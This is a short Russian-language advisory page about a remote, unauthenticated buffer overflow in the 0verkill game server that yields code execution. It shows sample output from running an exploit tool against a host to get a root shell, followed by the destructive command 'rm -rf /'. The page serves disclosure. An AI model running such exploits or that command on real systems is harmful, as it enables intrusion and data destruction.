Переполнение буфера в 0verkill

Дата публикации:
18.12.2002
Всего просмотров:
765
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: 0verkill популярная клиент-серверная игра в ASCII art. Серверная часть 0verkill по умолчанию установлена на 6666 UDP порту.

В программе обнаружена возможность удаленного переполнения буфера, которое может использоваться для выполнения произвольного кода с привилегиями 0verkill процесса. Для успешной эксплуатации уязвимости не требуется предварительная идентификация. Пример работы эксплоита:

 
deraadt@zeus.theos.com:~$ ./0verkillflow -t 5 -h 192.168.0.1 -o l -p 6666 Attacking host 192.168.0.1 (Linux 2.4.20-grsec).
*GOBBLE*
id; uname -a
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux spender 2.4.20 #1 Sat Dec 7 13:44:54 EST 2002 i686 unknown ^C

deraadt@zeus.theos.com:~$ su -
Password:
root@zeus.theos.com:~# rm -rf /&


Ссылки: iDEFENSE Security Advisory
или введите имя

CAPTCHA